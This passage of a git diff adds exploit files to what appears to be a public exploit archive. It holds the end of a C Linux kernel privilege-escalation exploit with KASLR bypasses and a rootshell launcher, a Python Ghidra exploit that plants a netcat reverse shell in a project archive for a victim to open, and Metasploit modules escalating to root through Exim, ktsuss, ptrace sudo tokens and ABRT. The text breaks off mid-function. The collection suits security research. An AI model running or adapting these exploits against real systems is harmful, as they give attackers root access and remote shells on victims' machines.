+    if (strstr(kernels[kernel].kernel_version, "14.04.1") != NULL)
+        addr = get_kernel_addr_trusty(syslog, size);
+    else
+        addr = get_kernel_addr_xenial(syslog, size);
+
+    if (!addr)
+        dprintf("[-] kernel base not found in syslog\n");
+
+    return addr;
+}
+
+// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_kallsyms() {
+    FILE *f;
+    unsigned long addr = 0;
+    char dummy;
+    char sname[256];
+    char* name = "startup_64";
+    char* path = "/proc/kallsyms";
+
+    dprintf("[.] trying %s...\n", path);
+    f = fopen(path, "r");
+    if (f == NULL) {
+        dprintf("[-] open/read(%s)\n", path);
+        return 0;
+    }
+
+    int ret = 0;
+    while (ret != EOF) {
+        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+        if (ret == 0) {
+            fscanf(f, "%s\n", sname);
+            continue;
+        }
+        if (!strcmp(name, sname)) {
+            fclose(f);
+            return addr;
+        }
+    }
+
+    fclose(f);
+    dprintf("[-] kernel base not found in %s\n", path);
+    return 0;
+}
+
+// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_sysmap() {
+    FILE *f;
+    unsigned long addr = 0;
+    char path[512] = "/boot/System.map-";
+    char version[32];
+
+    struct utsname u;
+    u = get_kernel_version();
+    strcat(path, u.release);
+    dprintf("[.] trying %s...\n", path);
+    f = fopen(path, "r");
+    if (f == NULL) {
+        dprintf("[-] open/read(%s)\n", path);
+        return 0;
+    }
+
+    char dummy;
+    char sname[256];
+    char* name = "startup_64";
+    int ret = 0;
+    while (ret != EOF) {
+        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+        if (ret == 0) {
+            fscanf(f, "%s\n", sname);
+            continue;
+        }
+        if (!strcmp(name, sname)) {
+            fclose(f);
+            return addr;
+        }
+    }
+
+    fclose(f);
+    dprintf("[-] kernel base not found in %s\n", path);
+    return 0;
+}
+
+// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_mincore() {
+    unsigned char buf[getpagesize()/sizeof(unsigned char)];
+    unsigned long iterations = 20000000;
+    unsigned long addr = 0;
+
+    dprintf("[.] trying mincore info leak...\n");
+    /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
+    if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,
+        MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+        dprintf("[-] mmap()\n");
+        return 0;
+    }
+
+    int i;
+    for (i = 0; i <= iterations; i++) {
+        /* Touch a mishandle with this type mapping */
+        if (mincore((void*)0x86000000, 0x1000000, buf)) {
+            dprintf("[-] mincore()\n");
+            return 0;
+        }
+
+        int n;
+        for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {
+            addr = *(unsigned long*)(&buf[n]);
+            /* Kernel address space */
+            if (addr > 0xffffffff00000000) {
+                addr &= 0xffffffffff000000ul;
+                if (munmap((void*)0x66000000, 0x20000000000))
+                    dprintf("[-] munmap()\n");
+                return addr;
+            }
+        }
+    }
+
+    if (munmap((void*)0x66000000, 0x20000000000))
+        dprintf("[-] munmap()\n");
+
+    dprintf("[-] kernel base not found in mincore info leak\n");
+    return 0;
+}
+
+// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr() {
+    unsigned long addr = 0;
+
+    addr = get_kernel_addr_kallsyms();
+    if (addr) return addr;
+
+    addr = get_kernel_addr_sysmap();
+    if (addr) return addr;
+
+    addr = get_kernel_addr_syslog();
+    if (addr) return addr;
+
+    addr = get_kernel_addr_mincore();
+    if (addr) return addr;
+
+    dprintf("[-] KASLR bypass failed\n");
+    exit(EXIT_FAILURE);
+
+    return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+void launch_rootshell(void)
+{
+    int fd;
+    char buf[256];
+    struct stat s;
+
+    fd = open(SYSCTL_PATH, O_WRONLY);
+
+    if(fd == -1) {
+        dprintf("[-] could not open %s\n", SYSCTL_PATH);
+        exit(EXIT_FAILURE);
+    }
+
+    memset(buf, '\x00', 256);
+
+    readlink("/proc/self/exe", (char *)&buf, 256);
+
+    write(fd, buf, strlen(buf)+1);
+
+    socket(AF_INET, SOCK_STREAM, 132);
+
+    if (stat(buf,&s) == 0 && s.st_uid == 0) {
+        dprintf("[+] binary executed by kernel, launching rootshell\n");
+        lseek(fd, 0, SEEK_SET);
+        write(fd, "/sbin/modprobe", 15);
+        close(fd);
+        execl(buf, buf, NULL);
+    } else {
+        dprintf("[-] could not create rootshell\n");
+        exit(EXIT_FAILURE);
+    }
+}
+
+void setup_sandbox() {
+    if (unshare(CLONE_NEWUSER) != 0) {
+        dprintf("[-] unshare(CLONE_NEWUSER)\n");
+        exit(EXIT_FAILURE);
+    }
+
+    if (unshare(CLONE_NEWNET) != 0) {
+        dprintf("[-] unshare(CLONE_NEWNET)\n");
+        exit(EXIT_FAILURE);
+    }
+}
+
+int main(int argc, char **argv)
+{
+    int status, pid;
+    struct utsname u;
+    char buf[512], *f;
+
+    if (getuid() == 0 && geteuid() == 0) {
+        chown("/proc/self/exe", 0, 0);
+        chmod("/proc/self/exe", 06755);
+        exit(0);
+    }
+
+    if (getuid() != 0 && geteuid() == 0) {
+        setresuid(0, 0, 0);
+        setresgid(0, 0, 0);
+        execl("/bin/bash", "bash", "-p", NULL);
+        exit(0);
+    }
+
+    dprintf("linux AF_PACKET race condition exploit by rebel\n");
+
+    dprintf("[.] starting\n");
+
+    dprintf("[.] checking hardware\n");
+    check_procs();
+    dprintf("[~] done, hardware looks good\n");
+
+    dprintf("[.] checking kernel version\n");
+    detect_versions();
+    dprintf("[~] done, version looks good\n");
+
+#if ENABLE_KASLR_BYPASS
+    dprintf("[.] KASLR bypass enabled, getting kernel base address\n");
+    KERNEL_BASE = get_kernel_addr();
+    dprintf("[~] done, kernel text:     %lx\n", KERNEL_BASE);
+#endif
+
+    dprintf("[.] proc_dostring:         %lx\n", PROC_DOSTRING);
+    dprintf("[.] modprobe_path:         %lx\n", MODPROBE_PATH);
+    dprintf("[.] register_sysctl_table: %lx\n", REGISTER_SYSCTL_TABLE);
+    dprintf("[.] set_memory_rw:         %lx\n", SET_MEMORY_RW);
+
+    pid = fork();
+    if (pid == 0) {
+        dprintf("[.] setting up namespace sandbox\n");
+        setup_sandbox();
+        dprintf("[~] done, namespace sandbox set up\n");
+        wrapper();
+        exit(0);
+    }
+
+    waitpid(pid, &status, 0);
+
+    launch_rootshell();
+    return 0;
+}
\ No newline at end of file
diff --git a/exploits/linux/local/47231.py b/exploits/linux/local/47231.py
new file mode 100755
index 000000000..4a486a4b1
--- /dev/null
+++ b/exploits/linux/local/47231.py
@@ -0,0 +1,60 @@
+import os
+import inspect
+import argparse
+import shutil
+from shutil import copyfile
+
+print("")
+print("")
+print("################################################")
+print("")
+print("------------------CVE-2019-13623----------------")
+print("")
+print("################################################")
+print("")
+print("-----------------Ghidra-Exploit-----------------")
+print("--Tested version: Ghidra Linux version <= 9.0.4-")
+print("------------------------------------------------")
+print("")
+print("################################################")
+print("")
+print("----------Exploit by: Etienne Lacoche-----------")
+print("---------Contact Twitter: @electr0sm0g----------")
+print("")
+print("------------------Discovered by:----------------")
+print("---------https://blog.fxiao.me/ghidra/----------")
+print("")
+print("--------Exploit tested on Ubuntu 18.04----------")
+print("-----------------Dependency: zip----------------")
+print("")
+print("################################################")
+print("")
+print("")
+
+parser = argparse.ArgumentParser()
+parser.add_argument("file", help="Path to input export .gar file",default=1)
+parser.add_argument("ip", help="Ip to nc listener",default=1)
+parser.add_argument("port", help="Port to nc listener",default=1)
+
+args = parser.parse_args()
+            
+if args.ip and args.port and args.file:
+
+    rootDirURL=os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
+    path = "../Ghidra/Features/Decompiler/os/linux64/decompile"
+    os.system("mkdir -p ../Ghidra/Features/Decompiler/os/linux64/")
+    os.system("echo 'rm -f x; mknod x p && nc "+args.ip+" "+args.port+" 0<x | /bin/bash 1>x' > decompile")
+    os.system("chmod +x decompile")
+    copyfile("decompile",path)
+    copyfile(args.file,rootDirURL+"/"+"project.gar")
+    os.system("zip -q project.gar ../Ghidra/Features/Decompiler/os/linux64/decompile")
+    os.system("echo 'To fully export this archive, place project.gar to GHIDRA_INSTALL_DIR root path and open it with Restore Project at Ghidra.' > README_BEFORE_OPEN_GAR_FILE")
+    os.system("zip -q project.zip README_BEFORE_OPEN_GAR_FILE")    
+    os.system("zip -q project.zip project.gar") 
+    os.system("rm decompile README_BEFORE_OPEN_GAR_FILE")
+    os.system("rm project.gar")
+    print("You can now share project.zip and start your local netcat listener.")
+    print("")
+    print("Project.gar must be placed and opened by victim at GHIDRA_INSTALL_DIR")
+    print("root path for payload execution.")
+    print("")
\ No newline at end of file
diff --git a/exploits/linux/local/47307.rb b/exploits/linux/local/47307.rb
new file mode 100755
index 000000000..a116ab597
--- /dev/null
+++ b/exploits/linux/local/47307.rb
@@ -0,0 +1,261 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'expect'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Exim 4.87 - 4.91 Local Privilege Escalation',
+      'Description'    => %q{
+        This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).
+        Improper validation of recipient address in deliver_message()
+        function in /src/deliver.c may lead to command execution with root privileges
+        (CVE-2019-10149).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Qualys', # Discovery and PoC (@qualys)
+          'Dennis Herrmann', # Working exploit (@dhn)
+          'Marco Ivaldi', # Working exploit (@0xdea)
+          'Guillaume André' # Metasploit module (@yaumn_)
+        ],
+      'DisclosureDate' => '2019-06-05',
+      'Platform'       => [ 'linux' ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        =>
+        [
+          [
+            'Exim 4.87 - 4.91',
+            lower_version: Gem::Version.new('4.87'),
+            upper_version: Gem::Version.new('4.91')
+          ]
+        ],
+      'DefaultOptions' =>
+        {
+          'PrependSetgid' => true,
+          'PrependSetuid' => true
+        },
+      'References'     =>
+        [
+          [ 'CVE', '2019-10149' ],
+          [ 'EDB', '46996' ],
+          [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]
+        ]
+    ))
+
+    register_options(
+      [
+        OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])
+      ])
+
+    register_advanced_options(
+      [
+        OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),
+        OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]),
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      ])
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def encode_command(cmd)
+    '\x' + cmd.unpack('H2' * cmd.length).join('\x')
+  end
+
+  def open_tcp_connection
+    socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)
+      params = Rex::Socket::Parameters.new({
+        'PeerHost' => '127.0.0.1',
+        'PeerPort' => datastore['EXIMPORT']
+      })
+      begin
+        socket = socket_subsystem.create_tcp_client_channel(params)
+      rescue => e
+        vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\
+                    "are you sure exim is listening on this port? (see EXIMPORT)")
+        raise e
+      end
+    return socket_subsystem, socket
+  end
+
+  def inject_payload(payload)
+    if session.type == 'meterpreter'
+      socket_subsystem, socket = open_tcp_connection
+
+      tcp_conversation = {
+        nil                                          => /220/,
+        'helo localhost'                             => /250/,
+        "MAIL FROM:<>"                               => /250/,
+        "RCPT TO:<${run{#{payload}}}@localhost>"     => /250/,
+        'DATA'                                       => /354/,
+        'Received:'                                  => nil,
+        '.'                                          => /250/
+      }
+
+      begin
+        tcp_conversation.each do |line, pattern|
+          Timeout.timeout(datastore['SendExpectTimeout']) do
+            if line
+              if line == 'Received:'
+                for i in (1..31)
+                  socket.puts("#{line} #{i}\n")
+                end
+              else
+                socket.puts("#{line}\n")
+              end
+            end
+            if pattern
+              socket.expect(pattern)
+            end
+          end
+        end
+      rescue Rex::ConnectionError => e
+        fail_with(Failure::Unreachable, e.message)
+      rescue Timeout::Error
+        fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')
+      ensure
+        socket.puts("QUIT\n")
+        socket.close
+        socket_subsystem.shutdown
+      end
+    else
+      unless cmd_exec("/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' "\
+                      "&& echo true").chomp.to_s == 'true'
+        fail_with(Failure::NotFound, "Port #{datastore['EXIMPORT']} is closed")
+      end
+
+      bash_script = %|
+        #!/bin/bash
+
+        exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}
+        read -u 3 && echo $REPLY
+        echo "helo localhost" >&3
+        read -u 3 && echo $REPLY
+        echo "mail from:<>" >&3
+        read -u 3 && echo $REPLY
+        echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3
+        read -u 3 && echo $REPLY
+        echo "data" >&3
+        read -u 3 && echo $REPLY
+        for i in $(seq 1 30); do
+          echo 'Received: $i' >&3
+        done
+        echo "." >&3
+        read -u 3 && echo $REPLY
+        echo "quit" >&3
+        read -u 3 && echo $REPLY
+      |
+
+      @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
+      write_file(@bash_script_path, bash_script)
+      register_file_for_cleanup(@bash_script_path)
+      chmod(@bash_script_path)
+      cmd_exec("/bin/bash -c \"#{@bash_script_path}\"")
+    end
+
+    print_status('Payload sent, wait a few seconds...')
+    Rex.sleep(5)
+  end
+
+  def check_for_bash
+    unless command_exists?('/bin/bash')
+      fail_with(Failure::NotFound, 'bash not found')
+    end
+  end
+
+  def on_new_session(session)
+    super
+
+    if session.type == 'meterpreter'
+      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
+      session.fs.file.rm(@payload_path)
+    else
+      session.shell_command_token("rm -f #{@payload_path}")
+    end
+  end
+
+  def check
+    if session.type == 'meterpreter'
+      begin
+        socket_subsystem, socket = open_tcp_connection
+      rescue
+        return CheckCode::Safe
+      end
+      res = socket.gets
+      socket.close
+      socket_subsystem.shutdown
+    else
+      check_for_bash
+      res = cmd_exec("/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && "\
+                     "(read -u 3 && echo $REPLY) || echo false'")
+      if res == 'false'
+         vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\
+                      "are you sure exim is listening on this port? (see EXIMPORT)")
+         return CheckCode::Safe
+      end
+    end
+
+    if res =~ /Exim ([0-9\.]+)/i
+      version = Gem::Version.new($1)
+      vprint_status("Found exim version: #{version}")
+      if version >= target[:lower_version] && version <= target[:upper_version]
+        return CheckCode::Appears
+      else
+        return CheckCode::Safe
+      end
+    end
+
+    CheckCode::Unknown
+  end
+
+  def exploit
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
+      end
+    end
+
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
+    if nosuid?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is mounted nosuid")
+    end
+
+    unless datastore['PrependSetuid'] && datastore['PrependSetgid']
+      fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \
+                                    'to get root privileges.')
+    end
+
+    if session.type == 'shell'
+      check_for_bash
+    end
+
+    @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
+    write_file(@payload_path, payload.encoded_exe)
+    register_file_for_cleanup(@payload_path)
+    inject_payload(encode_command("/bin/sh -c 'chown root #{@payload_path};"\
+                                  "chmod 4755 #{@payload_path}'"))
+
+    unless setuid?(@payload_path)
+      fail_with(Failure::Unknown, "Couldn't escalate privileges")
+    end
+
+    cmd_exec("#{@payload_path} & echo ")
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/47344.rb b/exploits/linux/local/47344.rb
new file mode 100755
index 000000000..df09d2abf
--- /dev/null
+++ b/exploits/linux/local/47344.rb
@@ -0,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ktsuss suid Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges by exploiting
+        a vulnerability in ktsuss versions 1.4 and prior.
+
+        The ktsuss executable is setuid root and does not drop
+        privileges prior to executing user specified commands,
+        resulting in command execution with root privileges.
+
+        This module has been tested successfully on:
+
+        ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and
+        ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'John Lightsey', # Discovery and exploit
+          'bcoles'         # Metasploit
+        ],
+      'DisclosureDate' => '2011-08-13',
+      'References'     =>
+        [
+          ['CVE', '2011-2921'],
+          ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],
+          ['URL', 'https://security.gentoo.org/glsa/201201-15'],
+          ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           =>
+        [
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [['Auto', {}]],
+      'DefaultOptions' =>
+        {
+          'AppendExit'       => true,
+          'PrependSetresuid' => true,
+          'PrependSetresgid' => true,
+          'PrependSetreuid'  => true,
+          'PrependSetuid'    => true,
+          'PrependFork'      => true
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def ktsuss_path
+    datastore['KTSUSS_PATH']
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+  end
+
+  def check
+    unless setuid? ktsuss_path
+      vprint_error "#{ktsuss_path} is not setuid"
+      return CheckCode::Safe
+    end
+    vprint_good "#{ktsuss_path} is setuid"
+
+    id = cmd_exec 'whoami'
+    res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s
+    vprint_status res
+
+    unless res.include? 'uid=0'
+      return CheckCode::Safe
+    end
+
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    payload_name = ".#{rand_text_alphanumeric 10..15}"
+    payload_path = "#{base_dir}/#{payload_name}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    print_status 'Executing payload ...'
+    id = cmd_exec 'whoami'
+    res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo "
+    vprint_line res
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/47345.rb b/exploits/linux/local/47345.rb
new file mode 100755
index 000000000..8afe41fe2
--- /dev/null
+++ b/exploits/linux/local/47345.rb
@@ -0,0 +1,213 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ptrace Sudo Token Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges by blindly injecting into
+        the session user's running shell processes and executing commands by
+        calling `system()`, in the hope that the process has valid cached sudo
+        tokens with root privileges.
+
+        The system must have gdb installed and permit ptrace.
+
+        This module has been tested successfully on:
+
+        Debian 9.8 (x64); and
+        CentOS 7.4.1708 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'chaignc', # sudo_inject
+          'bcoles'   # Metasploit
+        ],
+      'DisclosureDate' => '2019-03-24',
+      'References'     =>
+        [
+          ['EDB', '46989'],
+          ['URL', 'https://github.com/nongiach/sudo_inject'],
+          ['URL', 'https://www.kernel.org/doc/Documentation/security/Yama.txt'],
+          ['URL', 'http://man7.org/linux/man-pages/man2/ptrace.2.html'],
+          ['URL', 'https://lwn.net/Articles/393012/'],
+          ['URL', 'https://lwn.net/Articles/492667/'],
+          ['URL', 'https://linux-audit.com/protect-ptrace-processes-kernel-yama-ptrace_scope/'],
+          ['URL', 'https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html']
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           =>
+        [
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [['Auto', {}]],
+      'DefaultOptions' =>
+        {
+          'PrependSetresuid' => true,
+          'PrependSetresgid' => true,
+          'PrependFork'      => true,
+          'WfsDelay'         => 30
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      OptInt.new('TIMEOUT', [true, 'Process injection timeout (seconds)', '30'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def timeout
+    datastore['TIMEOUT']
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def check
+    if yama_enabled?
+      vprint_error 'YAMA ptrace scope is restrictive'
+      return CheckCode::Safe
+    end
+    vprint_good 'YAMA ptrace scope is not restrictive'
+
+    if command_exists? '/usr/sbin/getsebool'
+      if cmd_exec("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on && echo true").to_s.include? 'true'
+        vprint_error 'SELinux deny_ptrace is enabled'
+        return CheckCode::Safe
+      end
+      vprint_good 'SELinux deny_ptrace is disabled'
+    end
+
+    unless command_exists? 'sudo'
+      vprint_error 'sudo is not installed'
+      return CheckCode::Safe
+    end
+    vprint_good 'sudo is installed'
+
+    unless command_exists? 'gdb'
+      vprint_error 'gdb is not installed'
+      return CheckCode::Safe
+    end
+    vprint_good 'gdb is installed'
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    unless check == CheckCode::Detected
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    if nosuid? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
+    end
+
+    # Find running shell processes
+    shells = %w[ash ksh csh dash bash zsh tcsh fish sh]
+
+    system_shells = read_file('/etc/shells').to_s.each_line.map {|line|
+      line.strip
+    }.reject {|line|
+      line.starts_with?('#')
+    }.each {|line|
+      shells << line.split('/').last
+    }
+    shells = shells.uniq.reject {|shell| shell.blank?}
+
+    print_status 'Searching for shell processes ...'
+    pids = []
+    if command_exists? 'pgrep'
+      cmd_exec("pgrep '^(#{shells.join('|')})$' -u \"$(id -u)\"").to_s.each_line do |pid|
+        pids << pid.strip
+      end
+    else
+      shells.each do |s|
+        pidof(s).each {|p| pids << p.strip}
+      end
+    end
+
+    if pids.empty?
+      fail_with Failure::Unknown, 'Found no running shell processes'
+    end
+
+    print_status "Found #{pids.uniq.length} running shell processes"
+    vprint_status pids.join(', ')
+
+    # Upload payload
+    @payload_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
+    upload @payload_path, generate_payload_exe
+
+    # Blindly call system() in each shell process
+    pids.each do |pid|
+      print_status "Injecting into process #{pid} ..."
+
+      cmds = "echo | sudo -S /bin/chown 0:0 #{@payload_path} >/dev/null 2>&1 && echo | sudo -S /bin/chmod 4755 #{@payload_path} >/dev/null 2>&1"
+      sudo_inject = "echo 'call system(\"#{cmds}\")' | gdb -q -n -p #{pid} >/dev/null 2>&1"
+      res = cmd_exec sudo_inject, nil, timeout
+      vprint_line res unless res.blank?
+
+      next unless setuid? @payload_path
+
+      print_good "#{@payload_path} setuid root successfully"
+      print_status 'Executing payload...'
+      res = cmd_exec "#{@payload_path} & echo "
+      vprint_line res
+      return
+    end
+
+    fail_with Failure::NoAccess, 'Failed to create setuid root shell. Session user has no valid cached sudo tokens.'
+  end
+
+  def on_new_session(session)
+    if session.type.eql? 'meterpreter'
+      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+      session.fs.file.rm @payload_path
+    else
+      session.shell_command_token "rm -f '#{@payload_path}'"
+    end
+  ensure
+    super
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/47421.rb b/exploits/linux/local/47421.rb
new file mode 100755
index 000000000..a4aabd75e
--- /dev/null
+++ b/exploits/linux/local/47421.rb
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ABRT sosreport Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges on RHEL systems with
+        a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
+        as the crash handler.
+
+        `sosreport` uses an insecure temporary directory, allowing local users
+        to write to arbitrary files (CVE-2015-5287). This module uses a symlink
+        attack on `/var/tmp/abrt/cc-*$pid/` to overwrite the `modprobe` path
+        in `/proc/sys/kernel/modprobe`, resulting in root privileges.
+
+        Waiting for `sosreport` could take a few minutes.
+
+        This module has been tested successfully on:
+
+        abrt 2.1.11-12.el7 on RHEL 7.0 x86_64; and
+        abrt 2.1.11-19.el7 on RHEL 7.1 x86_64.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'rebel', # Discovery and sosreport-rhel7.py exploit
+          'bcoles' # Metasploit
+        ],
+      'DisclosureDate' => '2015-11-23',
+      'Platform'       => ['linux'],
+      'Arch'           =>
+        [
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [[ 'Auto', {} ]],
+      'References'     =>
+        [
+          ['BID', '78137'],
+          ['CVE', '2015-5287'],
+          ['EDB', '38832'],
+          ['URL', 'https://www.openwall.com/lists/oss-security/2015/12/01/1'],
+          ['URL', 'https://access.redhat.com/errata/RHSA-2015:2505'],
+          ['URL', 'https://access.redhat.com/security/cve/CVE-2015-5287'],
+          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1266837']
+        ]
+    ))
+    register_options [
+      OptInt.new('TIMEOUT', [true, 'Timeout for sosreport (seconds)', '600'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir']
+  end
+
+  def timeout
+    datastore['TIMEOUT']
+  end
+
+  def check
+    kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'
+    unless kernel_core_pattern.include? 'abrt-hook-ccpp'
